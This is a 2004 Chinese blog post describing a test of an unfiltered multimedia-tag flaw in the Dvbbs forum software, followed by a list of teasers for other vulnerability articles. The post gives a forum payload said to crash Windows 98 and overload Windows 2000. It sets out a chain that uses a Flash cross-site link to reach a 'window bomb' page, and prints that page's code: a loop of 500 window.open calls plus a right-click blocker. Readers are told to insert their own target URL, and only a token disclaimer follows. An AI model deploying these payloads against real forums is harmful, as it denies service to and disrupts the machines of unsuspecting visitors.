动网论坛多媒体标签未过滤漏洞

原创 2004年09月17日 17:54:00
动网论坛多媒体标签未过滤漏洞测试手记
今天在剑鹰看到这个漏洞的说明,就想测试一下,先找了个动网论坛,发贴的内容如下:
{mp=0,0}c:/ddos.rmi{/mp}
..........省去一部分。代码中记得把{}换成[]
经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。
对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。
再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了{mp=0,0}c:/ddos.rmi{/mp}语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~)
攻击过程:
在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上??????????//这样别人访问了这个插入了FLASH的贴就中招了~~~~
以下是HTML的代码:
html>
<head>
<title>窗口炸弹</title>
</head>
<body>
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
<p><!--webbot bot="HTMLMarkup" startspan --><html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
if (window.Event) 
document.captureEvents(Event.MOUSEUP);
function nocontextmenu()
{
event.cancelBubble = true
event.returnValue = false;
return false;
}
function norightclick(e)
{
if (window.Event)
{
 if (e.which == 2 || e.which == 3)
 return false;
}
else
 if (event.button == 2 || event.button == 3)
{
event.cancelBubble = true
event.returnValue = false;
 return false;
 }
}
document.oncontextmenu = nocontextmenu;??// for IE5+
document.onmousedown = norightclick;??// for all others
//-->
</script>
</body>
</html><!--webbot bot="HTMLMarkup" endspan -->
</p>
</body>
</html>
~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
把这句中的www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了~~
此文仅做为技术讨论之列,如果用于恶意破坏,后果将由你自来承担!!

动网论坛8.2经典注入漏洞利用

一、实验目的理解动网论坛8.2原理二、实验原理动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。三、实验环境本机:192.168.1.2 目标机:192.1...
  • lijia111111
  • lijia111111
  • 2017年01月23日 21:16
  • 1436

HTML5之多媒体标签

audio标签video标签 •音频:不支持时显示 •视频:不支持时显示 •controls属性:属性值与属性名同。可以省略。控制显示默认控制条。 •source标签:用来指定多个音频或视...
  • arvin_top
  • arvin_top
  • 2017年04月22日 19:22
  • 231

记录一次攻击事件(redis 未授权漏洞利用直接登录服务器)v

听到朋友说接到阿里云的报障,提示黑客把他的服务器当肉鸡了,当时有点怕怕,继而官方的网络带宽也爆了进而系统处于瘫痪,当时我需要帮他处理这个问题 1 在没有查到杀手之前我是先把带宽&端口用iptab...
  • whs_321
  • whs_321
  • 2016年06月22日 15:27
  • 10703

Memcache未授权访问漏洞利用及修复

memcached是一套分布式的高速缓存系统。它以Key-Value(键值对)形式将数据存储在内存中,这些数据通常是应用读取频繁的。正因为内存中数据的读取远远大于硬盘,因此可以用来加速应用的访问。本文...
  • qq_32506555
  • qq_32506555
  • 2016年12月12日 13:32
  • 1299

XSS漏洞解决方案之一:过滤器

XSS漏洞解决方案之一:过滤器 一:web.xml文件  漏洞 --> xssFilter com.baidu.rigel.sandbox.core.fi...
  • yucaifu1989
  • yucaifu1989
  • 2017年03月12日 13:35
  • 2349

织梦dedecms漏洞修复记

自己用dedecms在阿里云上搭建了套网站,之后阿里云漏洞提示,织梦有多个漏洞需要我修复,发我邮箱,今天整理了下,我遇到的漏洞,及我修复的过程。 漏洞描述:dedecms的/member/soft...
  • Harry_go
  • Harry_go
  • 2016年08月31日 10:04
  • 894

网狐6603棋牌网站程序后台部分任意文件上传漏洞

简要描述: 网狐6603棋牌网站程序是目前棋牌主流程序,网站后台部分存在任意文件上传漏洞 可直接getshell 得到这类系统的数据库权限 详细说明: 网狐6603棋牌程序 百...
  • liujiayu2
  • liujiayu2
  • 2015年12月02日 14:23
  • 3389

关于HTML的多媒体标签

代码示例如下: ===================================================               多媒体标签         bgso...
  • u010661782
  • u010661782
  • 2015年10月10日 10:58
  • 494

eschop漏洞修改记录

1. 漏洞名称: ecshop注入漏洞 补丁编号: 2862905 补丁文件: /api/client/includes/lib_api.php 补丁来源: 云盾自研 更新时间: 漏洞描述: ...
  • lwx2615
  • lwx2615
  • 2016年12月29日 14:45
  • 1181

PHP文件包含漏洞详解

http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包...
  • xysoul
  • xysoul
  • 2015年06月30日 00:10
  • 3525
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:动网论坛多媒体标签未过滤漏洞
举报原因:
原因补充:

(最多只允许输入30个字)